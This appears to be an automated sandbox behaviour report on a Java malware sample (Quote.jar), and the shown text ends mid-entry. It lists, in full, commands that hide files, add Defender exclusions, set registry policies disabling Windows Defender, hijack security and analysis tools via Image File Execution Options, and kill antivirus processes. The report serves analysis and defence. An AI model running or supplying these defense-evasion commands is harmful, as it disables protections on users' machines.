PID 4400 wrote to memory of 4432	4400	cmd.exe	313
PID 4400 wrote to memory of 4432	4400	cmd.exe	313
PID 4400 wrote to memory of 4560	4400	cmd.exe	314
PID 4400 wrote to memory of 4560	4400	cmd.exe	314
PID 3672 wrote to memory of 4580	3672	java.exe	315
PID 3672 wrote to memory of 4580	3672	java.exe	315
PID 4580 wrote to memory of 4684	4580	cmd.exe	317
PID 4580 wrote to memory of 4684	4580	cmd.exe	317
PID 4580 wrote to memory of 4668	4580	cmd.exe	318
PID 4580 wrote to memory of 4668	4580	cmd.exe	318
PID 3672 wrote to memory of 4804	3672	java.exe	319
PID 3672 wrote to memory of 4804	3672	java.exe	319
PID 4804 wrote to memory of 4720	4804	cmd.exe	321
PID 4804 wrote to memory of 4720	4804	cmd.exe	321
PID 4804 wrote to memory of 4900	4804	cmd.exe	322
PID 4804 wrote to memory of 4900	4804	cmd.exe	322
PID 3672 wrote to memory of 4876	3672	java.exe	323
PID 3672 wrote to memory of 4876	3672	java.exe	323
PID 4876 wrote to memory of 4968	4876	cmd.exe	325
PID 4876 wrote to memory of 4968	4876	cmd.exe	325
PID 4876 wrote to memory of 5108	4876	cmd.exe	326
PID 4876 wrote to memory of 5108	4876	cmd.exe	326
PID 3672 wrote to memory of 4128	3672	java.exe	327
PID 3672 wrote to memory of 4128	3672	java.exe	327
PID 4128 wrote to memory of 4104	4128	cmd.exe	329
PID 4128 wrote to memory of 4104	4128	cmd.exe	329
PID 4128 wrote to memory of 5024	4128	cmd.exe	330
PID 4128 wrote to memory of 5024	4128	cmd.exe	330
PID 3672 wrote to memory of 4184	3672	java.exe	331
PID 3672 wrote to memory of 4184	3672	java.exe	331
PID 4184 wrote to memory of 4372	4184	cmd.exe	333
PID 4184 wrote to memory of 4372	4184	cmd.exe	333
PID 4184 wrote to memory of 4424	4184	cmd.exe	334
PID 4184 wrote to memory of 4424	4184	cmd.exe	334
PID 3672 wrote to memory of 4536	3672	java.exe	335
PID 3672 wrote to memory of 4536	3672	java.exe	335
PID 4536 wrote to memory of 4656	4536	cmd.exe	337
PID 4536 wrote to memory of 4656	4536	cmd.exe	337
PID 4536 wrote to memory of 4684	4536	cmd.exe	338
PID 4536 wrote to memory of 4684	4536	cmd.exe	338
PID 3672 wrote to memory of 4796	3672	java.exe	339
PID 3672 wrote to memory of 4796	3672	java.exe	339
PID 4796 wrote to memory of 4864	4796	cmd.exe	341
PID 4796 wrote to memory of 4864	4796	cmd.exe	341
PID 4796 wrote to memory of 5052	4796	cmd.exe	342
PID 4796 wrote to memory of 5052	4796	cmd.exe	342
PID 3672 wrote to memory of 4968	3672	java.exe	343
PID 3672 wrote to memory of 4968	3672	java.exe	343
PID 3672 wrote to memory of 4204	3672	java.exe	345
PID 3672 wrote to memory of 4204	3672	java.exe	345
PID 3672 wrote to memory of 4712	3672	java.exe	347
PID 3672 wrote to memory of 4712	3672	java.exe	347
PID 3672 wrote to memory of 4920	3672	java.exe	349
PID 3672 wrote to memory of 4920	3672	java.exe	349
PID 3672 wrote to memory of 5000	3672	java.exe	351
PID 3672 wrote to memory of 5000	3672	java.exe	351
PID 3672 wrote to memory of 5024	3672	java.exe	353
PID 3672 wrote to memory of 5024	3672	java.exe	353
PID 3672 wrote to memory of 4900	3672	java.exe	355
PID 3672 wrote to memory of 4900	3672	java.exe	355
PID 3672 wrote to memory of 756	3672	java.exe	357
PID 3672 wrote to memory of 756	3672	java.exe	357

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
2140	attrib.exe
2716	attrib.exe
2824	attrib.exe
1416	attrib.exe
1580	attrib.exe
1936	attrib.exe
2052	attrib.exe
2080	attrib.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\Quote.jar
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3672
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:560
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:524
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:808
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:412
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1172
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:1416
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:1580
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\UaoPj\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1936
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\UaoPj\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:2052
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\UaoPj
  2⤵
  - Views/modifies file attributes
  PID:2080
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\UaoPj
  2⤵
  - Views/modifies file attributes
  PID:2140
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\UaoPj
  2⤵
  - Views/modifies file attributes
  PID:2716
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +s +r C:\Users\Admin\UaoPj\SbBYi.class
  2⤵
  - Views/modifies file attributes
  PID:2824
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:3876
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:3700
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\UaoPj','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\UaoPj\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3892
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:3764
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1736
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3344
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4064
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:1628
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:912
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:864
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1700
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:1824
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2100
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2820
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3360
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1448
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2192
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1228
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2980
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1856
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1548
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2148
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3740
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3932
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1812
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4064
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
    3⤵
    PID:2196
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
    3⤵
    PID:788
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2988
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
    3⤵
    PID:2980
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1576
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:2192
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:2884
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2088
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2708
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:3160
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:416
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:864
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:3020
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:912
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:860
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3396
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:2148
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:3528
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3468
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:1804
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:1224
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3388
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:3024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:860
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:980
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:3808
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:1224
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1452
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:1804
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:3808
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1864
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:3536
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:3876
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2808
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:3436
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:1548
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3856
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2980
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:3772
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:2132
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3360
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:3852
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:1028
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1804
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:3420
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:3304
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2256
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3808
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:1708
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:4116
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4136
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:4172
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:4192
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4212
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
    3⤵
    PID:4248
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
    3⤵
    PID:4268
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4288
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:4324
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:4344
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4364
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:4400
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:4420
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4444
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:4480
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:4500
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4520
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:4556
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:4576
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4596
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:4636
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:4656
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4676
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
    3⤵
    PID:4752
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
    3⤵
    PID:4780
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4688
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4808
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:4844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:4864
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4884
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:4920
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:4940
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:4996
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:5016
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5036
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
    3⤵
    PID:5072
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
    3⤵
    PID:5092
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5112
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:3772
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:3436
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4120
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4176
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4196
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4228
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4280
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4328
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4348
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:4412
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:4432
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4488
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:4500
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:4572
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4592
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:4640
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:4668
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4696
- - C:\Windows\system32\reg.exe
